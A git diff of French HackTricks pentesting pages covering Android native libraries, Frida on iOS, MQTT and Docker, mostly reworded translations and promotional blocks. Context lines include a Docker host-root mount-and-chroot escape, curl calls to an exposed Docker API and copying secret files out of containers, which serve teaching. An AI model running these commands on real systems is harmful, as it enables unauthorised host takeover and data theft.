- **Liaison statique :** Utilise `RegisterNatives` pour la liaison, offrant une flexibilité dans le nom et la structure des fonctions.
- **Liaison statique :** Utilise `RegisterNatives` pour la liaison, offrant une flexibilité dans la dénomination et la structure des fonctions.
- **Outils et techniques de rétro-ingénierie :**
- Des outils comme Ghidra et IDA Pro aident à analyser les bibliothèques natives.
@ -60,8 +60,8 @@ Les applications Android peuvent utiliser des bibliothèques natives, générale
### Ressources :
- **Apprentissage de l'assemblage ARM :**
- Recommandé pour une compréhension plus approfondie de l'architecture sous-jacente.
- [Bases de l'assemblage ARM](https://azeria-labs.com/writing-arm-assembly-part-1/) d'Azeria Labs est recommandé.
- Recommandé pour une compréhension approfondie de l'architecture sous-jacente.
- [Bases de l'assemblage ARM](https://azeria-labs.com/writing-arm-assembly-part-1/) de Azeria Labs est recommandé.
- **Documentation JNI & NDK :**
- [Spécification JNI d'Oracle](https://docs.oracle.com/javase/7/docs/technotes/guides/jni/spec/jniTOC.html)
@ -71,10 +71,9 @@ Les applications Android peuvent utiliser des bibliothèques natives, générale
- **Débogage des bibliothèques natives :**
- [Débogage des bibliothèques natives Android en utilisant JEB Decompiler](https://medium.com/@shubhamsonani/how-to-debug-android-native-libraries-using-jeb-decompiler-eec681a22cf3)
### [WhiteIntel](https://whiteintel.io)
## WhiteIntel
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
[**WhiteIntel**](https://whiteintel.io) est un moteur de recherche alimenté par le **dark web** qui offre des fonctionnalités **gratuites** pour vérifier si une entreprise ou ses clients ont été **compromis** par des **logiciels malveillants voleurs**.

View file

@ -2,21 +2,21 @@
<details>
<summary><strong>Apprenez le piratage AWS de zéro à héros avec</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (Expert en équipe rouge AWS de HackTricks)</strong></a><strong>!</strong></summary>
<summary><strong>Apprenez le piratage AWS de zéro à héros avec</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (Expert Red Team AWS de HackTricks)</strong></a><strong>!</strong></summary>
Autres façons de soutenir HackTricks :
* Si vous souhaitez voir votre **entreprise annoncée dans HackTricks** ou **télécharger HackTricks en PDF**, consultez les [**PLANS D'ABONNEMENT**](https://github.com/sponsors/carlospolop) !
* Obtenez le [**swag officiel PEASS & HackTricks**](https://peass.creator-spring.com)
* Découvrez [**La famille PEASS**](https://opensea.io/collection/the-peass-family), notre collection exclusive de [**NFT**](https://opensea.io/collection/the-peass-family)
* **Rejoignez le** 💬 [**groupe Discord**](https://discord.gg/hRep4RUj7f) ou le [**groupe Telegram**](https://t.me/peass) ou **suivez** nous sur **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
* **Partagez vos astuces de piratage en soumettant des PR aux** [**HackTricks**](https://github.com/carlospolop/hacktricks) et [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
- Si vous souhaitez voir votre **entreprise annoncée dans HackTricks** ou **télécharger HackTricks en PDF**, consultez les [**PLANS D'ABONNEMENT**](https://github.com/sponsors/carlospolop) !
- Obtenez le [**swag officiel PEASS & HackTricks**](https://peass.creator-spring.com)
- Découvrez [**La famille PEASS**](https://opensea.io/collection/the-peass-family), notre collection exclusive de [**NFT**](https://opensea.io/collection/the-peass-family)
- **Rejoignez le** 💬 [**groupe Discord**](https://discord.gg/hRep4RUj7f) ou le [**groupe Telegram**](https://t.me/peass) ou **suivez-nous** sur **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
- **Partagez vos astuces de piratage en soumettant des PR aux** [**HackTricks**](https://github.com/carlospolop/hacktricks) et [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
</details>
## WhiteIntel
### [WhiteIntel](https://whiteintel.io)
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
[**WhiteIntel**](https://whiteintel.io) est un moteur de recherche alimenté par le **dark web** qui offre des fonctionnalités **gratuites** pour vérifier si une entreprise ou ses clients ont été **compromis** par des **logiciels malveillants voleurs**.
@ -40,7 +40,7 @@ Vous pouvez consulter leur site Web et essayer leur moteur **gratuitement** sur
Si vous utilisez **Corellium**, vous devrez télécharger la version de Frida depuis [https://github.com/frida/frida/releases](https://github.com/frida/frida/releases) (`frida-gadget-[votreversion]-ios-universal.dylib.gz`) et décompressez et copiez à l'emplacement dylib demandé par Frida, par exemple : `/Users/[votreutilisateur]/.cache/frida/gadget-ios.dylib`
Une fois installé, vous pouvez utiliser sur votre PC la commande **`frida-ls-devices`** et vérifier que le périphérique apparaît (votre PC doit pouvoir y accéder).\
Une fois installé, vous pouvez utiliser sur votre PC la commande **`frida-ls-devices`** et vérifier que l'appareil apparaît (votre PC doit pouvoir y accéder).\
Exécutez également **`frida-ps -Uia`** pour vérifier les processus en cours d'exécution sur le téléphone.
## Frida sans appareil jailbreaké et sans patcher l'application
@ -171,7 +171,7 @@ console.log("loaded");
Vous trouverez un exemple mettant en œuvre Frida Stalker dans [https://github.com/poxyran/misc/blob/master/frida-stalker-example.py](https://github.com/poxyran/misc/blob/master/frida-stalker-example.py)
Voici un autre exemple pour attacher Frida Stalker chaque fois qu'une fonction est appelée:
Voici un autre exemple pour attacher Frida Stalker à chaque appel de fonction:
```javascript
console.log("loading");
const wg_log_addr = Module.findExportByName("<Program>", "<function_name>");
@ -327,7 +327,7 @@ Dans ce cas, nous ne redémarrons pas l'application ou ne restaurons pas l'état
De plus, Frida se connectera aux signaux d'exception d'iOS, donc lorsque Frida trouve un crash, il est probable qu'aucun rapport de crash iOS ne sera généré.
Pour éviter cela, par exemple, nous pourrions redémarrer l'application après chaque crash de Frida.
Pour prévenir cela, par exemple, nous pourrions redémarrer l'application après chaque crash de Frida.
{% endhint %}
### Journaux & Crashes
@ -350,7 +350,7 @@ vim /Library/Preferences/Logging/com.apple.system.logging.plist
killall -9 logd
```
Vous pouvez vérifier les crashs dans :
Vous pouvez vérifier les crashs dans:
* **iOS**
* Paramètres → Confidentialité → Analyse et améliorations → Données d'analyse
@ -374,15 +374,15 @@ iOS stocke uniquement 25 crashs de la même application, donc vous devez nettoye
* [https://www.briskinfosec.com/blogs/blogsdetail/Getting-Started-with-Frida](https://www.briskinfosec.com/blogs/blogsdetail/Getting-Started-with-Frida)
## WhiteIntel
### [WhiteIntel](https://whiteintel.io)
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
[**WhiteIntel**](https://whiteintel.io) est un moteur de recherche alimenté par le **dark web** qui offre des fonctionnalités **gratuites** pour vérifier si une entreprise ou ses clients ont été **compromis** par des **malwares voleurs**.
Le but principal de WhiteIntel est de lutter contre les prises de contrôle de compte et les attaques de ransomware résultant de malwares volant des informations.
Vous pouvez consulter leur site web et essayer leur moteur **gratuitement** sur :
Vous pouvez consulter leur site Web et essayer leur moteur **gratuitement** sur :
{% embed url="https://whiteintel.io" %}
@ -391,7 +391,7 @@ Vous pouvez consulter leur site web et essayer leur moteur **gratuitement** sur
<summary><strong>Apprenez le piratage AWS de zéro à héros avec</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
Autres façons de soutenir HackTricks :
Autres moyens de soutenir HackTricks:
* Si vous souhaitez voir votre **entreprise annoncée dans HackTricks** ou **télécharger HackTricks en PDF**, consultez les [**PLANS D'ABONNEMENT**](https://github.com/sponsors/carlospolop)!
* Obtenez le [**swag officiel PEASS & HackTricks**](https://peass.creator-spring.com)

View file

@ -2,7 +2,7 @@
<details>
<summary><strong>Apprenez le piratage AWS de zéro à héros avec</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (Expert en équipe rouge AWS de HackTricks)</strong></a><strong>!</strong></summary>
<summary><strong>Apprenez le piratage AWS de zéro à héros avec</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (Expert Red Team AWS de HackTricks)</strong></a><strong>!</strong></summary>
Autres façons de soutenir HackTricks :
@ -14,9 +14,9 @@ Autres façons de soutenir HackTricks :
</details>
## WhiteIntel
### [WhiteIntel](https://whiteintel.io)
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
[**WhiteIntel**](https://whiteintel.io) est un moteur de recherche alimenté par le **dark web** qui offre des fonctionnalités **gratuites** pour vérifier si une entreprise ou ses clients ont été **compromis** par des **logiciels malveillants voleurs**.
@ -46,14 +46,14 @@ nmap Pn -sSV -p1723 <IP>
<details>
<summary><strong>Apprenez le piratage AWS de zéro à héros avec</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (Expert de l'équipe rouge AWS de HackTricks)</strong></a><strong>!</strong></summary>
<summary><strong>Apprenez le piratage AWS de zéro à héros avec</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
Autres façons de soutenir HackTricks:
* Si vous souhaitez voir votre **entreprise annoncée dans HackTricks** ou **télécharger HackTricks en PDF**, consultez les [**PLANS D'ABONNEMENT**](https://github.com/sponsors/carlospolop)!
* Obtenez le [**swag officiel PEASS & HackTricks**](https://peass.creator-spring.com)
* Découvrez [**La famille PEASS**](https://opensea.io/collection/the-peass-family), notre collection exclusive de [**NFT**](https://opensea.io/collection/the-peass-family)
* **Rejoignez le** 💬 [**groupe Discord**](https://discord.gg/hRep4RUj7f) ou le [**groupe Telegram**](https://t.me/peass) ou **suivez** nous sur **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* Découvrez [**The PEASS Family**](https://opensea.io/collection/the-peass-family), notre collection exclusive de [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Rejoignez le** 💬 [**groupe Discord**](https://discord.gg/hRep4RUj7f) ou le [**groupe Telegram**](https://t.me/peass) ou **suivez-nous** sur **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Partagez vos astuces de piratage en soumettant des PR aux** [**HackTricks**](https://github.com/carlospolop/hacktricks) et [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) dépôts GitHub.
</details>

View file

@ -6,17 +6,17 @@
Autres façons de soutenir HackTricks :
* Si vous souhaitez voir votre **entreprise annoncée dans HackTricks** ou **télécharger HackTricks en PDF**, consultez les [**PLANS D'ABONNEMENT**](https://github.com/sponsors/carlospolop) !
* Obtenez le [**swag officiel PEASS & HackTricks**](https://peass.creator-spring.com)
* Découvrez [**La famille PEASS**](https://opensea.io/collection/the-peass-family), notre collection exclusive de [**NFT**](https://opensea.io/collection/the-peass-family)
* **Rejoignez le** 💬 [**groupe Discord**](https://discord.gg/hRep4RUj7f) ou le [**groupe Telegram**](https://t.me/peass) ou **suivez** nous sur **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
* **Partagez vos astuces de piratage en soumettant des PR aux** [**HackTricks**](https://github.com/carlospolop/hacktricks) et [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
- Si vous souhaitez voir votre **entreprise annoncée dans HackTricks** ou **télécharger HackTricks en PDF**, consultez les [**PLANS D'ABONNEMENT**](https://github.com/sponsors/carlospolop) !
- Obtenez le [**swag officiel PEASS & HackTricks**](https://peass.creator-spring.com)
- Découvrez [**La famille PEASS**](https://opensea.io/collection/the-peass-family), notre collection exclusive de [**NFT**](https://opensea.io/collection/the-peass-family)
- **Rejoignez le** 💬 [**groupe Discord**](https://discord.gg/hRep4RUj7f) ou le [**groupe Telegram**](https://t.me/peass) ou **suivez-nous** sur **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
- **Partagez vos astuces de piratage en soumettant des PR aux** [**HackTricks**](https://github.com/carlospolop/hacktricks) et [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
</details>
## WhiteIntel
### [WhiteIntel](https://whiteintel.io)
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
[**WhiteIntel**](https://whiteintel.io) est un moteur de recherche alimenté par le **dark web** qui offre des fonctionnalités **gratuites** pour vérifier si une entreprise ou ses clients ont été **compromis** par des **logiciels malveillants voleurs**.
@ -30,7 +30,7 @@ Vous pouvez consulter leur site Web et essayer leur moteur **gratuitement** sur
## Informations de base
**MQ Telemetry Transport (MQTT)** est connu comme un **protocole de messagerie publish/subscribe** qui se distingue par son extrême simplicité et sa légèreté. Ce protocole est spécifiquement conçu pour des environnements où les appareils ont des capacités limitées et fonctionnent sur des réseaux caractérisés par une faible bande passante, une latence élevée ou des connexions peu fiables. Les objectifs principaux de MQTT incluent la minimisation de l'utilisation de la bande passante réseau et la réduction de la demande sur les ressources des appareils. De plus, il vise à maintenir une communication fiable et à fournir un certain niveau d'assurance de livraison. Ces objectifs rendent MQTT exceptionnellement adapté au domaine en plein essor de la **communication machine à machine (M2M)** et de l'**Internet des objets (IoT)**, où il est essentiel de connecter efficacement une myriade d'appareils. De plus, MQTT est très bénéfique pour les applications mobiles, où la conservation de la bande passante et de la durée de vie de la batterie est cruciale.
**MQ Telemetry Transport (MQTT)** est connu comme un **protocole de messagerie publish/subscribe** qui se distingue par son extrême simplicité et sa légèreté. Ce protocole est spécifiquement conçu pour des environnements où les appareils ont des capacités limitées et fonctionnent sur des réseaux caractérisés par une bande passante faible, une latence élevée ou des connexions peu fiables. Les objectifs principaux de MQTT incluent la minimisation de l'utilisation de la bande passante réseau et la réduction de la demande sur les ressources des appareils. De plus, il vise à maintenir une communication fiable et à fournir un certain niveau d'assurance de livraison. Ces objectifs rendent MQTT exceptionnellement adapté au domaine en plein essor de la **communication machine à machine (M2M)** et de l'**Internet des objets (IoT)**, où il est essentiel de connecter efficacement une myriade d'appareils. De plus, MQTT est très bénéfique pour les applications mobiles, où la conservation de la bande passante et de la durée de vie de la batterie est cruciale.
**Port par défaut :** 1883
```
@ -105,10 +105,10 @@ main()
Le modèle de publication/abonnement est composé de :
* **Éditeur** : publie un message sur un (ou plusieurs) sujet(s) dans le courtier.
* **Abonné** : s'abonne à un (ou plusieurs) sujet(s) dans le courtier et reçoit tous les messages envoyés par l'éditeur.
* **Courtier** : route tous les messages des éditeurs vers les abonnés.
* **Sujet** : composé d'un ou plusieurs niveaux séparés par une barre oblique (par exemple, /smartshouse/livingroom/temperature).
- **Éditeur** : publie un message sur un (ou plusieurs) sujet(s) dans le courtier.
- **Abonné** : s'abonne à un (ou plusieurs) sujet(s) dans le courtier et reçoit tous les messages envoyés par l'éditeur.
- **Courtier** : route tous les messages des éditeurs vers les abonnés.
- **Sujet** : composé d'un ou plusieurs niveaux séparés par une barre oblique (par exemple, /smartshouse/livingroom/temperature).
### Format du Paquet <a href="#f15a" id="f15a"></a>
@ -118,33 +118,33 @@ Chaque paquet MQTT contient un en-tête fixe (Figure 02).Figure 02: En-tête Fix
### Types de Paquets
* CONNECT (1) : Initié par le client pour demander une connexion au serveur.
* CONNACK (2) : Accusé de réception du serveur d'une connexion réussie.
* PUBLISH (3) : Utilisé pour envoyer un message du client au serveur ou vice versa.
* PUBACK (4) : Accusé de réception d'un paquet PUBLISH.
* PUBREC (5) : Partie d'un protocole de livraison de message garantissant que le message est reçu.
* PUBREL (6) : Assurance supplémentaire dans la livraison de message, indiquant une libération de message.
* PUBCOMP (7) : Partie finale du protocole de livraison de message, indiquant l'achèvement.
* SUBSCRIBE (8) : Demande d'un client pour écouter les messages d'un sujet.
* SUBACK (9) : Accusé de réception du serveur d'une demande de SUBSCRIBE.
* UNSUBSCRIBE (10) : Demande d'un client d'arrêter de recevoir des messages d'un sujet.
* UNSUBACK (11) : Réponse du serveur à une demande de désabonnement.
* PINGREQ (12) : Un message de battement cardiaque envoyé par le client.
* PINGRESP (13) : Réponse du serveur au message de battement cardiaque.
* DISCONNECT (14) : Initié par le client pour terminer la connexion.
* Deux valeurs, 0 et 15, sont marquées comme réservées et leur utilisation est interdite.
- CONNECT (1) : Initié par le client pour demander une connexion au serveur.
- CONNACK (2) : Accusé de réception du serveur d'une connexion réussie.
- PUBLISH (3) : Utilisé pour envoyer un message du client au serveur ou vice versa.
- PUBACK (4) : Accusé de réception d'un paquet PUBLISH.
- PUBREC (5) : Partie d'un protocole de livraison de message garantissant que le message est reçu.
- PUBREL (6) : Assurance supplémentaire dans la livraison de message, indiquant une libération de message.
- PUBCOMP (7) : Partie finale du protocole de livraison de message, indiquant l'achèvement.
- SUBSCRIBE (8) : Demande d'un client pour écouter les messages d'un sujet.
- SUBACK (9) : Accusé de réception du serveur d'une demande de SUBSCRIBE.
- UNSUBSCRIBE (10) : Demande d'un client pour arrêter de recevoir des messages d'un sujet.
- UNSUBACK (11) : Réponse du serveur à une demande de désabonnement.
- PINGREQ (12) : Message de battement de cœur envoyé par le client.
- PINGRESP (13) : Réponse du serveur au message de battement de cœur.
- DISCONNECT (14) : Initié par le client pour terminer la connexion.
- Deux valeurs, 0 et 15, sont marquées comme réservées et leur utilisation est interdite.
## Shodan
* `port:1883 MQTT`
- `port:1883 MQTT`
## WhiteIntel
### [WhiteIntel](https://whiteintel.io)
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
[**WhiteIntel**](https://whiteintel.io) est un moteur de recherche alimenté par le **dark web** qui offre des fonctionnalités **gratuites** pour vérifier si une entreprise ou ses clients ont été **compromis** par des **logiciels malveillants voleurs**.
Le but principal de WhiteIntel est de lutter contre les prises de contrôle de compte et les attaques de ransomware résultant de logiciels malveillants voleurs d'informations.
Le but principal de WhiteIntel est de lutter contre les prises de contrôle de compte et les attaques de ransomware résultant de logiciels malveillants volant des informations.
Vous pouvez consulter leur site Web et essayer leur moteur **gratuitement** sur :
@ -154,12 +154,12 @@ Vous pouvez consulter leur site Web et essayer leur moteur **gratuitement** sur
<summary><strong>Apprenez le piratage AWS de zéro à héros avec</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
D'autres façons de soutenir HackTricks :
Autres façons de soutenir HackTricks :
* Si vous souhaitez voir votre **entreprise annoncée dans HackTricks** ou **télécharger HackTricks en PDF**, consultez les [**PLANS D'ABONNEMENT**](https://github.com/sponsors/carlospolop) !
* Obtenez le [**swag officiel PEASS & HackTricks**](https://peass.creator-spring.com)
* Découvrez [**The PEASS Family**](https://opensea.io/collection/the-peass-family), notre collection exclusive de [**NFT**](https://opensea.io/collection/the-peass-family)
* **Rejoignez le** 💬 [**groupe Discord**](https://discord.gg/hRep4RUj7f) ou le [**groupe Telegram**](https://t.me/peass) ou **suivez** nous sur **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
* **Partagez vos astuces de piratage en soumettant des PR aux** [**HackTricks**](https://github.com/carlospolop/hacktricks) et [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
- Si vous souhaitez voir votre **entreprise annoncée dans HackTricks** ou **télécharger HackTricks en PDF**, consultez les [**PLANS D'ABONNEMENT**](https://github.com/sponsors/carlospolop) !
- Obtenez le [**swag officiel PEASS & HackTricks**](https://peass.creator-spring.com)
- Découvrez [**The PEASS Family**](https://opensea.io/collection/the-peass-family), notre collection exclusive de [**NFT**](https://opensea.io/collection/the-peass-family)
- **Rejoignez le** 💬 [**groupe Discord**](https://discord.gg/hRep4RUj7f) ou le [**groupe Telegram**](https://t.me/peass) ou **suivez** nous sur **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
- **Partagez vos astuces de piratage en soumettant des PR aux** [**HackTricks**](https://github.com/carlospolop/hacktricks) et [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
</details>

View file

@ -1,22 +1,22 @@
# 2375, 2376 Test d'intrusion Docker
# 2375, 2376 Pentesting Docker
<details>
<summary><strong>Apprenez le piratage AWS de zéro à héros avec</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (Expert en équipe rouge AWS de HackTricks)</strong></a><strong>!</strong></summary>
Autres façons de soutenir HackTricks :
Autres façons de soutenir HackTricks:
* Si vous souhaitez voir votre **entreprise annoncée dans HackTricks** ou **télécharger HackTricks en PDF**, consultez les [**PLANS D'ABONNEMENT**](https://github.com/sponsors/carlospolop)!
* Obtenez le [**swag officiel PEASS & HackTricks**](https://peass.creator-spring.com)
* Découvrez [**La famille PEASS**](https://opensea.io/collection/the-peass-family), notre collection exclusive de [**NFT**](https://opensea.io/collection/the-peass-family)
* Découvrez [**La famille PEASS**](https://opensea.io/collection/the-peass-family), notre collection exclusive de [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Rejoignez le** 💬 [**groupe Discord**](https://discord.gg/hRep4RUj7f) ou le [**groupe Telegram**](https://t.me/peass) ou **suivez-nous** sur **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
* **Partagez vos astuces de piratage en soumettant des PR aux** [**HackTricks**](https://github.com/carlospolop/hacktricks) et [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) dépôts GitHub.
</details>
## WhiteIntel
### [WhiteIntel](https://whiteintel.io)
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
[**WhiteIntel**](https://whiteintel.io) est un moteur de recherche alimenté par le **dark web** qui offre des fonctionnalités **gratuites** pour vérifier si une entreprise ou ses clients ont été **compromis** par des **logiciels malveillants voleurs**.
@ -38,7 +38,7 @@ Docker est la **plateforme de pointe** dans l'industrie de la **conteneurisation
* [**containerd**](http://containerd.io) : Il s'agit d'un **runtime central** pour les conteneurs, chargé de la **gestion complète du cycle de vie d'un conteneur**. Cela implique la gestion du **transfert et du stockage des images**, en plus de superviser l'**exécution, la surveillance et le réseau** des conteneurs. Des **aperçus plus détaillés** sur containerd sont **explorés plus en détail**.
* Le **container-shim** joue un rôle crucial en tant qu'**intermédiaire** dans la gestion des **conteneurs sans tête**, prenant en charge de manière transparente **runc** après l'initialisation des conteneurs.
* [**runc**](http://runc.io) : Estimé pour ses capacités de **runtime de conteneur léger et universel**, runc est aligné sur la **norme OCI**. Il est utilisé par containerd pour **démarrer et gérer les conteneurs** selon les **directives OCI**, ayant évolué à partir de l'**original libcontainer**.
* [**runc**](http://runc.io) : Réputé pour ses capacités de **runtime de conteneur léger et universel**, runc est aligné sur la **norme OCI**. Il est utilisé par containerd pour **démarrer et gérer les conteneurs** selon les **directives OCI**, ayant évolué à partir de l'**original libcontainer**.
* [**grpc**](http://www.grpc.io) est essentiel pour **faciliter la communication** entre containerd et le **moteur Docker**, assurant une **interaction efficace**.
* L'[**OCI**](https://www.opencontainers.org) est essentiel pour maintenir les **spécifications OCI** pour le runtime et les images, les dernières versions de Docker étant **conformes aux normes OCI** pour les images et le runtime.
@ -67,11 +67,11 @@ docker system prune -a
```
#### Containerd
**Containerd** a été spécifiquement développé pour répondre aux besoins des plateformes de conteneurs telles que **Docker et Kubernetes**, entre autres. Son objectif est de **simplifier l'exécution de conteneurs** sur différents systèmes d'exploitation, notamment Linux, Windows, Solaris, et autres, en abstrayant les fonctionnalités spécifiques à chaque système d'exploitation et les appels système. L'objectif de Containerd est d'inclure uniquement les fonctionnalités essentielles requises par ses utilisateurs, en s'efforçant d'omettre les composants inutiles. Cependant, il est reconnu que la réalisation complète de cet objectif est un défi.
**Containerd** a été spécifiquement développé pour répondre aux besoins des plateformes de conteneurs telles que **Docker et Kubernetes**, entre autres. Son objectif est de **simplifier l'exécution de conteneurs** sur différents systèmes d'exploitation, y compris Linux, Windows, Solaris, et autres, en abstrayant les fonctionnalités spécifiques à chaque système d'exploitation et les appels système. L'objectif de Containerd est d'inclure uniquement les fonctionnalités essentielles requises par ses utilisateurs, en s'efforçant d'omettre les composants inutiles. Cependant, il est reconnu que la réalisation de cet objectif est difficile.
Une décision de conception clé est que **Containerd ne gère pas le réseau**. Le réseau est considéré comme un élément critique dans les systèmes distribués, avec des complexités telles que le Réseau Défini par Logiciel (SDN) et la découverte de services qui varient considérablement d'une plateforme à l'autre. Par conséquent, Containerd laisse les aspects réseau être gérés par les plateformes qu'il prend en charge.
Une décision de conception clé est que **Containerd ne gère pas le réseau**. Le réseau est considéré comme un élément critique dans les systèmes distribués, avec des complexités telles que le Réseau Défini par Logiciel (SDN) et la découverte de services qui varient considérablement d'une plateforme à l'autre. Par conséquent, Containerd laisse les aspects réseau à être gérés par les plateformes qu'il prend en charge.
Alors que **Docker utilise Containerd** pour exécuter des conteneurs, il est important de noter que Containerd ne prend en charge qu'un sous-ensemble des fonctionnalités de Docker. Plus précisément, Containerd ne dispose pas des capacités de gestion du réseau présentes dans Docker et ne prend pas en charge la création de grappes Docker directement. Cette distinction met en évidence le rôle ciblé de Containerd en tant qu'environnement d'exécution de conteneurs, déléguant des fonctionnalités plus spécialisées aux plateformes avec lesquelles il s'intègre.
Alors que **Docker utilise Containerd** pour exécuter des conteneurs, il est important de noter que Containerd ne prend en charge qu'un sous-ensemble des fonctionnalités de Docker. Plus précisément, Containerd ne dispose pas des capacités de gestion réseau présentes dans Docker et ne prend pas en charge la création de grappes Docker directement. Cette distinction met en évidence le rôle ciblé de Containerd en tant qu'environnement d'exécution de conteneurs, déléguant des fonctionnalités plus spécialisées aux plateformes avec lesquelles il s'intègre.
```bash
#Containerd CLI
ctr images pull --skip-verify --plain-http registry:5000/alpine:latest #Get image
@ -89,7 +89,7 @@ ctr container delete <containerName>
```
#### Podman
**Podman** est un moteur de conteneur open source qui respecte les normes de l'[Open Container Initiative (OCI)](https://github.com/opencontainers), développé et maintenu par Red Hat. Il se distingue de Docker par plusieurs fonctionnalités distinctes, notamment son architecture **sans démon** et la prise en charge des **conteneurs sans privilèges root**, permettant aux utilisateurs d'exécuter des conteneurs sans privilèges root.
**Podman** est un moteur de conteneur open source qui respecte les normes de l'[Open Container Initiative (OCI)](https://github.com/opencontainers), développé et maintenu par Red Hat. Il se distingue de Docker par plusieurs fonctionnalités distinctes, notamment son **architecture sans démon** et la prise en charge des **conteneurs sans privilèges root**, permettant aux utilisateurs d'exécuter des conteneurs sans privilèges root.
Podman est conçu pour être compatible avec l'API de Docker, permettant l'utilisation des commandes CLI de Docker. Cette compatibilité s'étend à son écosystème, qui comprend des outils tels que **Buildah** pour la construction d'images de conteneurs et **Skopeo** pour les opérations sur les images telles que push, pull et inspect. Vous trouverez plus de détails sur ces outils sur leur [page GitHub](https://github.com/containers/buildah/tree/master/docs/containertools).
@ -172,7 +172,7 @@ docker run -it -v /:/host/ ubuntu:latest chroot /host/ bash
```
**Curl**
Parfois, vous verrez **2376** pour le point de terminaison **TLS**. Je n'ai pas pu me connecter avec le client docker, mais il est possible de le faire avec curl.
Parfois, vous verrez **2376** disponible pour le point de terminaison **TLS**. Je n'ai pas pu me connecter avec le client docker, mais il est possible de le faire avec curl.
```bash
#List containers
curl insecure https://tlsopen.docker.socket:2376/containers/json | jq
@ -288,7 +288,7 @@ docker cp <docket_id>:/etc/<secret_01> <secret_01>
#### Enregistrement des activités suspectes
* Vous pouvez utiliser l'outil [https://github.com/falcosecurity/falco](https://github.com/falcosecurity/falco) pour détecter **des comportements suspects dans les conteneurs en cours d'exécution**.
* Vous pouvez utiliser l'outil [https://github.com/falcosecurity/falco](https://github.com/falcosecurity/falco) pour détecter **les comportements suspects dans les conteneurs en cours d'exécution**.
* Notez dans le morceau suivant comment **Falco compile un module de noyau et l'insère**. Ensuite, il charge les règles et **commence à enregistrer les activités suspectes**. Dans ce cas, il a détecté 2 conteneurs privilégiés démarrés, dont l'un avec un montage sensible, et après quelques secondes, il a détecté l'ouverture d'un shell à l'intérieur de l'un des conteneurs.
```bash
docker run -it --privileged -v /var/run/docker.sock:/host/var/run/docker.sock -v /dev:/host/dev -v /proc:/host/proc:ro -v /boot:/host/boot:ro -v /lib/modules:/host/lib/modules:ro -v /usr:/host/usr:ro falco
@ -340,9 +340,9 @@ Vous pouvez utiliser auditd pour surveiller Docker.
* [https://stackoverflow.com/questions/41645665/how-containerd-compares-to-runc](https://stackoverflow.com/questions/41645665/how-containerd-compares-to-runc)
## WhiteIntel
### [WhiteIntel](https://whiteintel.io)
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
[**WhiteIntel**](https://whiteintel.io) est un moteur de recherche alimenté par le **dark web** qui offre des fonctionnalités **gratuites** pour vérifier si une entreprise ou ses clients ont été **compromis** par des **logiciels malveillants voleurs**.

View file

@ -2,11 +2,11 @@
<details>
<summary><strong>Apprenez le piratage AWS de zéro à héros avec</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (Expert de l'équipe rouge AWS de HackTricks)</strong></a><strong>!</strong></summary>
<summary><strong>Apprenez le piratage AWS de zéro à héros avec</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (Expert Red Team AWS de HackTricks)</strong></a><strong>!</strong></summary>
Autres façons de soutenir HackTricks :
